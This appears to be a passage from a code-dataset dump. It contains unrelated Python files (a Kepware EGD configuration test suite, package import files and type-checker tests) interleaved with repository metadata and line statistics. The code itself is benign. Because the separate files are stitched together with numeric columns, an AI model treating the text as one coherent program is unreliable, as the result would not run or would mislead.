unittest.makeSuite(Test__build_sqlite3_tbl)
))
if __name__ == "__main__":
# run tests
runner = unittest.TextTestRunner()
runner.run(suite())
| 29.987069
| 76
| 0.512434
| 1,019
| 6,957
| 3.439647
| 0.118744
| 0.043367
| 0.085592
| 0.094151
| 0.80428
| 0.769472
| 0.76234
| 0.76234
| 0.762054
| 0.762054
| 0
| 0.076923
| 0.301136
| 6,957
| 231
| 77
| 30.116883
| 0.643974
| 0.073164
| 0
| 0.634731
| 0
| 0
| 0.049406
| 0
| 0
| 0
| 0
| 0
| 0.155689
| 1
| 0.065868
| false
| 0
| 0.047904
| 0.005988
| 0.125749
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c52f144df1276663726e2afdc91e4c778f1100ae
| 14,870
|
py
|
Python
|
tests/egd_test.py
|
PTCInc/Kepware-ConfigAPI-SDK-Python
|
ff7757492a7ea1e73f3d5862ba956c8af4dcc797
|
[
"MIT"
] | 9
|
2020-04-08T18:48:03.000Z
|
2022-03-18T15:05:01.000Z
|
tests/egd_test.py
|
PTCInc/Kepware-ConfigAPI-SDK-Python
|
ff7757492a7ea1e73f3d5862ba956c8af4dcc797
|
[
"MIT"
] | 5
|
2020-08-24T15:08:54.000Z
|
2022-03-16T17:07:09.000Z
|
tests/egd_test.py
|
PTCInc/Kepware-ConfigAPI-SDK-Python
|
ff7757492a7ea1e73f3d5862ba956c8af4dcc797
|
[
"MIT"
] | 10
|
2020-03-23T20:40:17.000Z
|
2021-11-14T08:42:56.000Z
|
# -------------------------------------------------------------------------
# Copyright (c) PTC Inc. All rights reserved.
# See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# EGD Test - Test to exersice all GE EGD driver exchange related features
# including, exchanges, ranges and name resolutions
import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import kepconfig
import kepconfig.connectivity
import time
import datetime
import pytest
# import connectivity, admin, iot_gateway, datalogger
# Channel and Device name to be used
ch_name = 'EGD'
dev_name = 'Device1'
consumer_exchange = {
"common.ALLTYPES_NAME": "0",
"common.ALLTYPES_DESCRIPTION": "",
"ge_ethernet_global_data.CONSUMER_EXCHANGE_ID": 0,
"ge_ethernet_global_data.CONSUMER_EXCHANGE_NUMBER": 1,
"ge_ethernet_global_data.CONSUMER_EXCHANGE_PRODUCER_ID": "192.168.1.130",
"ge_ethernet_global_data.CONSUMER_EXCHANGE_GROUP_ID": 1,
"ge_ethernet_global_data.CONSUMER_EXCHANGE_CONSUMED_PERIOD_MS": 1000,
"ge_ethernet_global_data.CONSUMER_EXCHANGE_UPDATE_TIMEOUT_MS": 10000
}
consumer_exchange10 = {
"common.ALLTYPES_NAME": "10",
"common.ALLTYPES_DESCRIPTION": "",
"ge_ethernet_global_data.CONSUMER_EXCHANGE_ID": 10,
"ge_ethernet_global_data.CONSUMER_EXCHANGE_NUMBER": 10,
"ge_ethernet_global_data.CONSUMER_EXCHANGE_PRODUCER_ID": "192.168.1.130",
"ge_ethernet_global_data.CONSUMER_EXCHANGE_GROUP_ID": 1,
"ge_ethernet_global_data.CONSUMER_EXCHANGE_CONSUMED_PERIOD_MS": 1000,
"ge_ethernet_global_data.CONSUMER_EXCHANGE_UPDATE_TIMEOUT_MS": 10000
}
producer_exchange = {
"common.ALLTYPES_NAME": "0",
"common.ALLTYPES_DESCRIPTION": "",
"ge_ethernet_global_data.PRODUCER_EXCHANGE_ID": 0,
"ge_ethernet_global_data.PRODUCER_EXCHANGE_NUMBER": 0,
"ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_TYPE": 1,
'ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_GROUP_ID':0,
"ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_IP": "10.10.10.10",
'ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_NAME': '',
"ge_ethernet_global_data.PRODUCER_EXCHANGE_PRODUCER_INTERVAL_MS": 10
}
producer_exchange10 = {
"common.ALLTYPES_NAME": "10",
"common.ALLTYPES_DESCRIPTION": "",
"ge_ethernet_global_data.PRODUCER_EXCHANGE_ID": 10,
"ge_ethernet_global_data.PRODUCER_EXCHANGE_NUMBER": 10,
"ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_TYPE": 1,
'ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_GROUP_ID':0,
"ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_IP": "10.10.10.10",
'ge_ethernet_global_data.PRODUCER_EXCHANGE_CONSUMED_ADDRESS_NAME': '',
"ge_ethernet_global_data.PRODUCER_EXCHANGE_PRODUCER_INTERVAL_MS": 10
}
range1 = {
"common.ALLTYPES_NAME": "Range_0",
"common.ALLTYPES_DESCRIPTION": "",
"ge_ethernet_global_data.RANGE_INDEX": 1,
"ge_ethernet_global_data.RANGE_OFFSET": 0,
"ge_ethernet_global_data.RANGE_REFERENCE": 0,
"ge_ethernet_global_data.RANGE_LOW_POINT": 0,
"ge_ethernet_global_data.RANGE_HIGH_POINT": 8
}
range2 = {
"common.ALLTYPES_NAME": "Range_1",
"common.ALLTYPES_DESCRIPTION": "",
"ge_ethernet_global_data.RANGE_INDEX": 2,
"ge_ethernet_global_data.RANGE_OFFSET": 18,
"ge_ethernet_global_data.RANGE_REFERENCE": 6,
"ge_ethernet_global_data.RANGE_LOW_POINT": 0,
"ge_ethernet_global_data.RANGE_HIGH_POINT": 10
}
name1 = {
"common.ALLTYPES_NAME": "PLC1",
"common.ALLTYPES_DESCRIPTION": "",
"ge_ethernet_global_data.NAME_RESOLUTION_ALIAS": "PLC1",
"ge_ethernet_global_data.NAME_RESOLUTION_IP_ADDRESS": "192.168.1.200"
}
name2 = {
"common.ALLTYPES_NAME": "PLC2",
"common.ALLTYPES_DESCRIPTION": "",
"ge_ethernet_global_data.NAME_RESOLUTION_ALIAS": "PLC2",
"ge_ethernet_global_data.NAME_RESOLUTION_IP_ADDRESS": "192.168.1.201"
}
def HTTPErrorHandler(err):
if err.__class__ is kepconfig.error.KepHTTPError:
print(err.code)
print(err.msg)
print(err.url)
print(err.hdrs)
print(err.payload)
else:
print('Different Exception Received: {}'.format(err))
egd_device = {
"common.ALLTYPES_NAME": ch_name,
"servermain.MULTIPLE_TYPES_DEVICE_DRIVER": "GE Ethernet Global Data",
"devices": [{
"common.ALLTYPES_NAME": dev_name,
"servermain.MULTIPLE_TYPES_DEVICE_DRIVER": "GE Ethernet Global Data"
}]
}
def initialize(server):
try:
server._config_get(server.url +"/doc/drivers/GE Ethernet Global Data/channels")
except Exception as err:
pytest.skip("EGD Driver is not installed", allow_module_level=True)
try:
kepconfig.connectivity.channel.add_channel(server,egd_device) == True
except Exception as err:
pytest.skip("Device Configuration couldn't be added", allow_module_level=True)
def complete(server):
try:
kepconfig.connectivity.channel.del_channel(server,egd_device['common.ALLTYPES_NAME'])
except Exception as err:
HTTPErrorHandler(err)
@pytest.fixture(scope="module")
def server(kepware_server):
server = kepware_server
# Initialize any configuration before testing in module
initialize(server)
# Everything below yield is run after module tests are completed
yield server
complete(server)
def remove_projectid(DATA):
if type(DATA) is dict:
DATA.pop('PROJECT_ID', None)
elif type(DATA) is list:
for item in DATA:
if type(item) is list:
for x in item:
x.pop('PROJECT_ID', None)
else:
item.pop('PROJECT_ID', None)
return DATA
# Exchange Tests
def create_exchange(server, exchange_type, exchanges):
assert kepconfig.connectivity.egd.exchange.add_exchange(server, ch_name + '.' + dev_name, exchange_type, exchanges[0])
# Delete
assert kepconfig.connectivity.egd.exchange.del_exchange(server, ch_name + '.' + dev_name, exchange_type, exchanges[0]['common.ALLTYPES_NAME'])
# Add multiple Exchanges
assert kepconfig.connectivity.egd.exchange.add_exchange(server, ch_name + '.' + dev_name, exchange_type, exchanges)
def get_exchange(server, exchange_type, exchanges):
# Get a specific Exchange
ret = kepconfig.connectivity.egd.exchange.get_exchange(server, ch_name + '.' + dev_name, exchange_type, exchanges[0]['common.ALLTYPES_NAME'])
assert type(ret) == dict, 'Unexpected data type return. {}'.format(type(ret))
assert remove_projectid(ret) == exchanges[0]
# Get All exchanges for exchange type
ret = kepconfig.connectivity.egd.exchange.get_exchange(server, ch_name + '.' + dev_name, exchange_type)
assert type(ret) == list, 'Unexpected data type return. {}'.format(type(ret))
assert remove_projectid(ret) == exchanges
# Get All exchanges for device
ret = kepconfig.connectivity.egd.exchange.get_all_exchanges(server, ch_name + '.' + dev_name)
assert type(ret) == list
if exchange_type == kepconfig.connectivity.egd.PRODUCER_EXCHANGE:
assert remove_projectid(ret) == [[],exchanges]
else:
assert remove_projectid(ret) == [exchanges,[]]
def modify_exchange(server, exchange_type, exchange_name):
assert kepconfig.connectivity.egd.exchange.modify_exchange(server, ch_name + '.' + dev_name, exchange_type,
{"ge_ethernet_global_data.CONSUMER_EXCHANGE_NUMBER": 2}, exchange_name)
assert kepconfig.connectivity.egd.exchange.modify_exchange(server, ch_name + '.' + dev_name, exchange_type,
{"common.ALLTYPES_NAME": exchange_name,"ge_ethernet_global_data.CONSUMER_EXCHANGE_NUMBER": 3})
assert kepconfig.connectivity.egd.exchange.modify_exchange(server, ch_name + '.' + dev_name, exchange_type,
{"common.ALLTYPES_NAME": exchange_name,"ge_ethernet_global_data.CONSUMER_EXCHANGE_NUMBER": 4}, force=True)
def delete_exchange(server, exchange_type, exchange_name):
assert kepconfig.connectivity.egd.exchange.del_exchange(server, ch_name + '.' + dev_name, exchange_type, exchange_name)
# Exchange Range tests
def create_range(server, exchange_type, exchange_name, ranges):
assert kepconfig.connectivity.egd.range.add_range(server, ch_name + '.' + dev_name, exchange_type, exchange_name, ranges[0])
# Delete
assert kepconfig.connectivity.egd.range.del_range(server, ch_name + '.' + dev_name, exchange_type, exchange_name, ranges[0]['common.ALLTYPES_NAME'])
# Add multiple ranges
assert kepconfig.connectivity.egd.range.add_range(server, ch_name + '.' + dev_name, exchange_type, exchange_name, ranges)
def get_range(server, exchange_type, exchange_name, ranges):
# Get a specific range
ret = kepconfig.connectivity.egd.range.get_range(server, ch_name + '.' + dev_name, exchange_type, exchange_name, ranges[0]['common.ALLTYPES_NAME'])
assert type(ret) == dict, 'Unexpected data type return. {}'.format(type(ret))
assert remove_projectid(ret) == ranges[0]
# Get All ranges for Exchange
ret = kepconfig.connectivity.egd.range.get_range(server, ch_name + '.' + dev_name, exchange_type, exchange_name)
assert type(ret) == list, 'Unexpected data type return. {}'.format(type(ret))
assert remove_projectid(ret) == ranges
def modify_range(server, exchange_type, exchange_name, range_name):
assert kepconfig.connectivity.egd.range.modify_range(server, ch_name + '.' + dev_name, exchange_type, exchange_name,
{"ge_ethernet_global_data.RANGE_HIGH_POINT": 10}, range_name)
assert kepconfig.connectivity.egd.range.modify_range(server, ch_name + '.' + dev_name, exchange_type, exchange_name,
{"common.ALLTYPES_NAME": range_name,"ge_ethernet_global_data.RANGE_HIGH_POINT": 11})
assert kepconfig.connectivity.egd.range.modify_range(server, ch_name + '.' + dev_name, exchange_type, exchange_name,
{"common.ALLTYPES_NAME": range_name,"ge_ethernet_global_data.RANGE_HIGH_POINT": 8}, force=True)
def delete_range(server, exchange_type, exchange_name, range_name):
assert kepconfig.connectivity.egd.range.del_range(server, ch_name + '.' + dev_name, exchange_type, exchange_name, range_name)
# Name Resolution Tests
def create_name(server, names):
assert kepconfig.connectivity.egd.name.add_name_resolution(server, ch_name + '.' + dev_name, names[0])
# Delete
assert kepconfig.connectivity.egd.name.del_name_resolution(server, ch_name + '.' + dev_name, names[0]['common.ALLTYPES_NAME'])
# Add multiple ranges
assert kepconfig.connectivity.egd.name.add_name_resolution(server, ch_name + '.' + dev_name, names)
def get_name(server, names):
# Get a specific range
ret = kepconfig.connectivity.egd.name.get_name_resolution(server, ch_name + '.' + dev_name, names[0]['common.ALLTYPES_NAME'])
assert type(ret) == dict, 'Unexpected data type return. {}'.format(type(ret))
assert remove_projectid(ret) == names[0]
# Get All ranges for Exchange
ret = kepconfig.connectivity.egd.name.get_name_resolution(server, ch_name + '.' + dev_name)
assert type(ret) == list, 'Unexpected data type return. {}'.format(type(ret))
assert remove_projectid(ret) == names
def modify_name(server, name):
assert kepconfig.connectivity.egd.name.modify_name_resolution(server, ch_name + '.' + dev_name,
{"ge_ethernet_global_data.NAME_RESOLUTION_IP_ADDRESS": '192.168.1.50'}, name)
assert kepconfig.connectivity.egd.name.modify_name_resolution(server, ch_name + '.' + dev_name,
{"common.ALLTYPES_NAME": name,"ge_ethernet_global_data.NAME_RESOLUTION_IP_ADDRESS": '192.168.1.100'})
assert kepconfig.connectivity.egd.name.modify_name_resolution(server, ch_name + '.' + dev_name,
{"common.ALLTYPES_NAME": name,"ge_ethernet_global_data.NAME_RESOLUTION_IP_ADDRESS": '192.168.1.202'}, force=True)
def delete_name(server, name):
assert kepconfig.connectivity.egd.name.del_name_resolution(server, ch_name + '.' + dev_name, name)
#
# MAIN TEST SET
#
def test_consumer_exchange(server):
# initialize(server)
create_exchange(server, kepconfig.connectivity.egd.CONSUMER_EXCHANGE,[consumer_exchange, consumer_exchange10])
get_exchange(server, kepconfig.connectivity.egd.CONSUMER_EXCHANGE, [consumer_exchange, consumer_exchange10])
# Range Tests
create_range(server, kepconfig.connectivity.egd.CONSUMER_EXCHANGE, consumer_exchange['common.ALLTYPES_NAME'], [range1, range2])
get_range(server, kepconfig.connectivity.egd.CONSUMER_EXCHANGE, consumer_exchange['common.ALLTYPES_NAME'], [range1, range2])
modify_range(server, kepconfig.connectivity.egd.CONSUMER_EXCHANGE, consumer_exchange['common.ALLTYPES_NAME'], range1['common.ALLTYPES_NAME'])
delete_range(server, kepconfig.connectivity.egd.CONSUMER_EXCHANGE, consumer_exchange['common.ALLTYPES_NAME'], range1['common.ALLTYPES_NAME'])
modify_exchange(server, kepconfig.connectivity.egd.CONSUMER_EXCHANGE, consumer_exchange['common.ALLTYPES_NAME'])
delete_exchange(server, kepconfig.connectivity.egd.CONSUMER_EXCHANGE, consumer_exchange['common.ALLTYPES_NAME'])
delete_exchange(server, kepconfig.connectivity.egd.CONSUMER_EXCHANGE, consumer_exchange10['common.ALLTYPES_NAME'])
# complete(server)
def test_producer_exchange(server):
# initialize(server)
create_exchange(server, kepconfig.connectivity.egd.PRODUCER_EXCHANGE,[producer_exchange, producer_exchange10])
get_exchange(server, kepconfig.connectivity.egd.PRODUCER_EXCHANGE, [producer_exchange, producer_exchange10])
# Range Tests
create_range(server, kepconfig.connectivity.egd.PRODUCER_EXCHANGE, producer_exchange['common.ALLTYPES_NAME'], [range1, range2])
get_range(server, kepconfig.connectivity.egd.PRODUCER_EXCHANGE, producer_exchange['common.ALLTYPES_NAME'], [range1, range2])
modify_range(server, kepconfig.connectivity.egd.PRODUCER_EXCHANGE, producer_exchange['common.ALLTYPES_NAME'], range1['common.ALLTYPES_NAME'])
delete_range(server, kepconfig.connectivity.egd.PRODUCER_EXCHANGE, producer_exchange['common.ALLTYPES_NAME'], range1['common.ALLTYPES_NAME'])
modify_exchange(server, kepconfig.connectivity.egd.PRODUCER_EXCHANGE, producer_exchange['common.ALLTYPES_NAME'])
delete_exchange(server, kepconfig.connectivity.egd.PRODUCER_EXCHANGE, producer_exchange['common.ALLTYPES_NAME'])
delete_exchange(server, kepconfig.connectivity.egd.PRODUCER_EXCHANGE, producer_exchange10['common.ALLTYPES_NAME'])
# complete(server)
def test_name_resolutions(server):
# initialize(server)
create_name(server, [name1, name2])
get_name(server, [name1, name2])
modify_name(server, name1['common.ALLTYPES_NAME'])
delete_name(server, name1['common.ALLTYPES_NAME'])
# complete(server)
| 47.206349
| 152
| 0.742367
| 1,877
| 14,870
| 5.559403
| 0.103356
| 0.049832
| 0.079732
| 0.099665
| 0.81955
| 0.790034
| 0.758026
| 0.732726
| 0.710014
| 0.691711
| 0
| 0.01618
| 0.135508
| 14,870
| 315
| 153
| 47.206349
| 0.795566
| 0.071083
| 0
| 0.254545
| 0
| 0
| 0.302505
| 0.196298
| 0
| 0
| 0
| 0
| 0.163636
| 1
| 0.090909
| false
| 0
| 0.027273
| 0
| 0.122727
| 0.027273
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3d79c359112f09fc22957fc7a430fa909d19ae6c
| 86
|
py
|
Python
|
projects/BUC/bucreid/__init__.py
|
weleen/MGH.pytorch
|
69f2830f6bd60fe3b33c80c04540c0c800d26de1
|
[
"Apache-2.0"
] | 4
|
2021-10-06T15:57:29.000Z
|
2021-12-21T12:46:19.000Z
|
projects/BUC/bucreid/__init__.py
|
weleen/MGH.pytorch
|
69f2830f6bd60fe3b33c80c04540c0c800d26de1
|
[
"Apache-2.0"
] | 1
|
2022-02-14T06:36:19.000Z
|
2022-02-24T08:18:39.000Z
|
projects/BUC/bucreid/__init__.py
|
weleen/MGH.pytorch
|
69f2830f6bd60fe3b33c80c04540c0c800d26de1
|
[
"Apache-2.0"
] | null | null | null |
from . import hooks
from .buc_head import BUCHead
from .buc_trainer import BUCTrainer
| 21.5
| 35
| 0.825581
| 13
| 86
| 5.307692
| 0.615385
| 0.202899
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 86
| 3
| 36
| 28.666667
| 0.932432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3d9379f89599315d55e3696697c75c28944db226
| 73
|
py
|
Python
|
astra/models.py
|
BottleJia/Redis-astra
|
f27288c383ef4710c2a97416fc268242cdf95100
|
[
"MIT"
] | 87
|
2016-03-07T08:38:56.000Z
|
2021-11-12T11:42:34.000Z
|
astra/models.py
|
BottleJia/Redis-astra
|
f27288c383ef4710c2a97416fc268242cdf95100
|
[
"MIT"
] | 5
|
2016-03-10T20:49:28.000Z
|
2021-06-30T08:01:43.000Z
|
astra/models.py
|
BottleJia/Redis-astra
|
f27288c383ef4710c2a97416fc268242cdf95100
|
[
"MIT"
] | 6
|
2016-03-17T21:28:25.000Z
|
2021-07-29T05:49:59.000Z
|
from astra.model import Model # NOQA
from astra.fields import * # NOQA
| 24.333333
| 37
| 0.739726
| 11
| 73
| 4.909091
| 0.545455
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.191781
| 73
| 2
| 38
| 36.5
| 0.915254
| 0.123288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3ddf8abc9c69ec711d4eb128c3666c0bc922c405
| 29
|
py
|
Python
|
backend/src/viasp/__init__.py
|
glaserL/viasp
|
740cb13c9d71c76b9a702597083b5b75b5a5eafb
|
[
"MIT"
] | null | null | null |
backend/src/viasp/__init__.py
|
glaserL/viasp
|
740cb13c9d71c76b9a702597083b5b75b5a5eafb
|
[
"MIT"
] | 9
|
2022-03-15T12:10:58.000Z
|
2022-03-23T19:33:51.000Z
|
backend/src/viasp/__init__.py
|
glaserL/viasp
|
740cb13c9d71c76b9a702597083b5b75b5a5eafb
|
[
"MIT"
] | null | null | null |
from .wrapper import Control
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9a8e9cb36657351164b3181435e91fb6a0f1efc0
| 639
|
py
|
Python
|
rl_environments/vrep/__init__.py
|
molomono/rl_environments
|
e625790cf27b7e8362859421a7fd937879f601e4
|
[
"MIT"
] | null | null | null |
rl_environments/vrep/__init__.py
|
molomono/rl_environments
|
e625790cf27b7e8362859421a7fd937879f601e4
|
[
"MIT"
] | null | null | null |
rl_environments/vrep/__init__.py
|
molomono/rl_environments
|
e625790cf27b7e8362859421a7fd937879f601e4
|
[
"MIT"
] | null | null | null |
from rl_environments.vrep.cartpole_vrep_env import CartPoleVrepEnv
from rl_environments.vrep.cartpole_continuous_vrep_env import CartPoleContinuousVrepEnv
from rl_environments.vrep.hopper_vrep_env import HopperVrepEnv
from rl_environments.vrep.balancebot_vrep_env import BalanceBotVrepEnv
from rl_environments.vrep.balancebot_vrep_env_noise import BalanceBotVrepEnvNoise
from rl_environments.vrep.balancebot_vrep_balance import BalanceBotVrepEnvBalance
from rl_environments.vrep.cartpole_continuous_swingup_vrep_env import DoubleCartPoleSwingupVrepEnv
from rl_environments.vrep.balancebot_vrep_locomotion import BalanceBotVrepEnvLocomotion
| 79.875
| 98
| 0.926448
| 76
| 639
| 7.421053
| 0.289474
| 0.085106
| 0.255319
| 0.312057
| 0.460993
| 0.407801
| 0.138298
| 0
| 0
| 0
| 0
| 0
| 0.048513
| 639
| 8
| 99
| 79.875
| 0.927632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9ac857a9dbc818d09cd40df31f83a8c894332c6c
| 46
|
py
|
Python
|
continuum/transforms/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 282
|
2020-05-09T21:35:22.000Z
|
2022-03-20T11:29:41.000Z
|
continuum/transforms/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 180
|
2020-05-03T09:31:48.000Z
|
2022-03-30T12:12:48.000Z
|
continuum/transforms/__init__.py
|
oleksost/continuum
|
682d66540bfbfa171ac73281ed2989f9338e88bf
|
[
"MIT"
] | 34
|
2020-06-13T14:09:29.000Z
|
2022-03-14T14:05:07.000Z
|
from continuum.transforms import segmentation
| 23
| 45
| 0.891304
| 5
| 46
| 8.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 1
| 46
| 46
| 0.97619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9aef2d03f798ec7d186b9708f6569585b948b6ba
| 2,573
|
py
|
Python
|
src/test_type_checkers.py
|
jsphweid/annhouga
|
f00f64907e1c4ff9a5e03ffa5b46bd1f7dbb5d75
|
[
"MIT"
] | 1
|
2018-02-14T09:47:15.000Z
|
2018-02-14T09:47:15.000Z
|
src/test_type_checkers.py
|
jsphweid/annhouga
|
f00f64907e1c4ff9a5e03ffa5b46bd1f7dbb5d75
|
[
"MIT"
] | null | null | null |
src/test_type_checkers.py
|
jsphweid/annhouga
|
f00f64907e1c4ff9a5e03ffa5b46bd1f7dbb5d75
|
[
"MIT"
] | null | null | null |
import type_checkers as types
# is_int
def test_basic_is_int():
assert types.is_int(5) == True
def test_string_cannot_be_int():
assert types.is_int('5') == False
def test_float_is_not_int1():
assert types.is_int(1.53) == False
def test_float_is_not_int2():
assert types.is_int(5.) == False
def test_boolean_is_not_int1():
assert types.is_int(False) == False
def test_boolean_is_not_int2():
assert types.is_int(True) == False
# is_float
def test_basic_is_float():
assert types.is_float(4.3) == True
def test_string_cannot_be_float():
assert types.is_float('5') == False
def test_int_is_not_float():
assert types.is_float(5) == False
def test_plain_zero_is_not_float():
assert types.is_float(0) == False
def test_boolean_is_not_float1():
assert types.is_float(False) == False
def test_boolean_is_not_float2():
assert types.is_float(True) == False
# is_real_number
def test_int_is_real_number():
assert types.is_real_number(5) == True
def test_float_is_real_number():
assert types.is_real_number(5.1) == True
def test_complex_num_is_not_real_number():
assert types.is_real_number(1j) == False
def test_string_is_not_real_number():
assert types.is_real_number('test') == False
def test_dict_is_not_real_number():
assert types.is_real_number({}) == False
def test_list_is_not_real_number():
assert types.is_real_number([1]) == False
# is_list_with_two_numbers
def test_is_list_with_two_numbers1():
assert types.is_list_with_two_numbers([1, 2]) == True
def test_is_list_with_two_numbers2():
assert types.is_list_with_two_numbers([1., 2]) == True
def test_is_list_with_two_numbers3():
assert types.is_list_with_two_numbers([-4, 2.3248]) == True
def test_list_with_3_numbers_is_false():
assert types.is_list_with_two_numbers([-4, 2.3248, 11]) == False
def test_list_with_a_string_is_false():
assert types.is_list_with_two_numbers(['lol', 2.3248]) == False
def test_dict_with_two_items_is_false():
assert types.is_list_with_two_numbers({ "one": 1, "two": 2 }) == False
# is_list_of_dictionaries
def test_is_list_of_dictionaries():
assert types.is_list_of_dictionaries([{}, {}]) == True
def test_is_list_of_dictionaries_with_lists_is_false():
assert types.is_list_of_dictionaries([[], []]) == False
def test_is_list_of_dictionaries_with_strs_is_false():
assert types.is_list_of_dictionaries(['test', 'hi']) == False
def test_is_list_of_dictionaries_with_ints_and_dicts_is_false():
assert types.is_list_of_dictionaries([5, {}]) == False
| 26.255102
| 74
| 0.748931
| 429
| 2,573
| 4
| 0.137529
| 0.118298
| 0.212121
| 0.075758
| 0.736014
| 0.708625
| 0.589744
| 0.472611
| 0.33042
| 0.109557
| 0
| 0.023329
| 0.133696
| 2,573
| 97
| 75
| 26.525773
| 0.746523
| 0.030703
| 0
| 0
| 0
| 0
| 0.008447
| 0
| 0
| 0
| 0
| 0
| 0.491228
| 1
| 0.491228
| true
| 0
| 0.017544
| 0
| 0.508772
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
9afd34867cbe58d5bcad884cfe3c8288e82a9b32
| 173
|
py
|
Python
|
MentalUs/models.py
|
realityone/MentalUs
|
1c9c267efc258e274839d8e040a42272821d6e3f
|
[
"Apache-2.0"
] | null | null | null |
MentalUs/models.py
|
realityone/MentalUs
|
1c9c267efc258e274839d8e040a42272821d6e3f
|
[
"Apache-2.0"
] | null | null | null |
MentalUs/models.py
|
realityone/MentalUs
|
1c9c267efc258e274839d8e040a42272821d6e3f
|
[
"Apache-2.0"
] | null | null | null |
from user.models import MTUser, MTExtendFields, MTUserExtendInfo
from general.models import MTAnnouncement
from scale.models import MTScale, MTScaleResult, MTUnfinishedScale
| 57.666667
| 66
| 0.872832
| 19
| 173
| 7.947368
| 0.684211
| 0.238411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086705
| 173
| 3
| 66
| 57.666667
| 0.955696
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b11301e97f7fd1b3cca4413ad186732d22b4c61a
| 8,063
|
py
|
Python
|
src/compas/datastructures/mesh/smoothing.py
|
mpopescu/compas
|
55f259607deea501f862cbaea79bd97d7e56ead6
|
[
"MIT"
] | null | null | null |
src/compas/datastructures/mesh/smoothing.py
|
mpopescu/compas
|
